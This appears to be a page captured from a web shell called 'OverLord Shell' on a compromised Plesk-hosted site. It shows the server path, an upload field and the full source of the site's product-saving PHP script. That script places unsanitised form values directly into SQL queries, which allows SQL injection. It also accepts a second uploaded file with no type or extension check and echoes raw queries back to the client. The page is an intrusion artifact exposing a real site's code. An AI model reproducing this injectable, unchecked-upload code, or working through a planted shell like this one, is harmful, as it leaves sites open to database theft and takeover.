OverLord Shell

Path : G:/PleskVhosts/jaincensus.com/macciaweb.ultraliant.com/businessforum/
File Upload :
Current File : G:/PleskVhosts/jaincensus.com/macciaweb.ultraliant.com/businessforum/userproductadd_save1.php

<?php session_start();
error_reporting(0);
session_start();

include("db/conn.php");

if(!isset($_SESSION['company_id']) || !isset($_SESSION['company_name'])){session_destroy();header("location:login.php");}
if(!in_array($_SESSION['loggedin_user'],array('admin','company'))){header("location:404.php");}


/*$target_dir = "uploads/";
code to upload logo
if(!empty($_FILES["product_photo"]["name"]))
{
	 $product_photo = $target_dir ."products/".time()."_".clean($company_name)."_".basename($_FILES["product_photo"]["name"]);
	 echo $product_photo;
	if (move_uploaded_file($_FILES["product_photo"]["tmp_name"], $product_photo)) {
    } else {
        echo "Sorry, there was an error uploading.";exit;
    }
}
else
{
 	$product_photo = $_POST["product_photo"];
}

if(!empty($_FILES["catlog"]["name"]))
{
	 $catlog = $target_dir ."products/".time()."_".clean($company_name)."_".basename($_FILES["catlog"]["name"]);
	 echo $catlog;
	if (move_uploaded_file($_FILES["catlog"]["tmp_name"], $catlog)) {
		
    } else {
        echo "Sorry, there was an error uploading.";exit;
    }
}
else
{
 	$product_photo = $_POST["product_photo"];
}*/

$fname=$_FILES['imgname']['name'];
if(!empty($fname)){
	$ftype=$_FILES['imgname']['type'];
	if($_FILES['imgname']['error']==1){echo "Image upload error.";exit;}
	else{
		if($_FILES['imgname']['size'] < 2*1024*1024){
			if($ftype=="image/jpeg" || $ftype=="image/pjpeg" || $ftype=="image/gif" || $ftype=="image/png"){
				$ext=explode('.',basename($fname));
				$ext=end($ext);
				$file_name=date('YmdHis').".".$ext;
			}else{echo "Image type error. Only JPG, PNG and GIF allowed.";exit;}
		}else{echo "Image size error. Max size is 2 MB.";exit;}
	}
}else{echo "Please upload Image.";exit;}
$product_name=$_POST['product_name'];
$company_id=$_SESSION['company_id'];
$my_company_id=$_POST['my_company_id'];
$price=$_POST['price'];
$discounted_price=$_POST['discounted_price'];
$catlog=$_FILES["catlog"]["name"];
$offer_des=$_POST['textBox'];
$description=str_replace("'", '',$_POST['description']);
$catid=$_POST['catid'];
$subcatid=$_POST['subcatid'];
$photo_path=$_FILES["photo_path"]["name"];


if($offer_des!=''){
	$offer_flg=1;
	
}else{
	$offer_flg=0;
}

//echo"INSERT INTO `busdir_product`(`product_name`, `company_id`,`my_company_id`, `catid`, `subcatid`,  `price`, `discounted_price`, `offer_des`,`offer_flg`,`description`, `active` , `catlog` ,`createdby`) VALUES ('$product_name', '$company_id','$my_company_id',  '$catid', '$subcatid',  '$price', '$discounted_price', '$offer_des','$offer_flg','$description','y','$catlog','".$_SESSION['company_id']."' )";exit;

  $sql=	"INSERT INTO `busdir_product`(`product_name`, `company_id`,`my_company_id`, `catid`, `subcatid`,  `price`, `discounted_price`, `offer_des`,`offer_flg`,`description`, `active` , `catlog` ,`createdby`) VALUES ('$product_name', '$company_id','$my_company_id',  '$catid', '$subcatid',  '$price', '$discounted_price', '$offer_des','$offer_flg','$description','y','$catlog','".$_SESSION['company_id']."' )";
			$adder=$connection->query($sql);
			
			 $last_id = $connection->insert_id;
			
			if($adder){
							
				if(!empty($_FILES["catlog"]["name"]))
{
	  	$catlogpath="uploads/products/".time()."_".basename($_FILES["catlog"]["name"]);
		//echo $catlogpath;
		
		//$product_photo_path="uploads/products/".time()."_".basename($_FILES["photo_path"]["name"]);
		$product_photo_path=time()."_".basename($_FILES["photo_path"]["name"]);
		
		//echo $product_photo_path;
	
		if($_FILES["catlog"]['size'] < 2*1024*1024){
			
			
			//@unlink($_POST["old_company_logo_path"]);
	
		if(@move_uploaded_file($_FILES["photo_path"]["tmp_name"], 'uploads/products/'.$product_photo_path)){
			$updateq0="	UPDATE busdir_product 
						SET  catlog = '$catlogpath'	
						WHERE product_id=".$last_id;
						//echo $updateq0;exit;
			$updater0=$connection->query($updateq0);
			echo "INSERT INTO `busdir_product_photo`(`product_id`, `photo_path`, `createdby`) VALUES ('$last_id','$product_photo_path','".$_SESSION['company_id']."')";
			$updateq1=	"INSERT INTO `busdir_product_photo`(`product_id`, `photo_path`, `createdby`) VALUES ('$last_id','$product_photo_path','".$_SESSION['company_id']."')";
			$updater1=$connection->query($updateq1);
		
		
			if($updateq0 && $updater1){
			                               	echo "success";
			                           }else{
				
												$sql="DELETE FROM `busdir_product` WHERE `product_id`=".$last_id;
												
												echo "An unknown error occured. Please try again.";
											  }
		}
		}
		else
		{
			
			echo "Image size error. Max size is 2 MB.";
			exit;
		}
}
				
			}
			
			
			else echo "An unknown error occured. Please try again.";
			


?>

xRyukZ - Copyright 2k19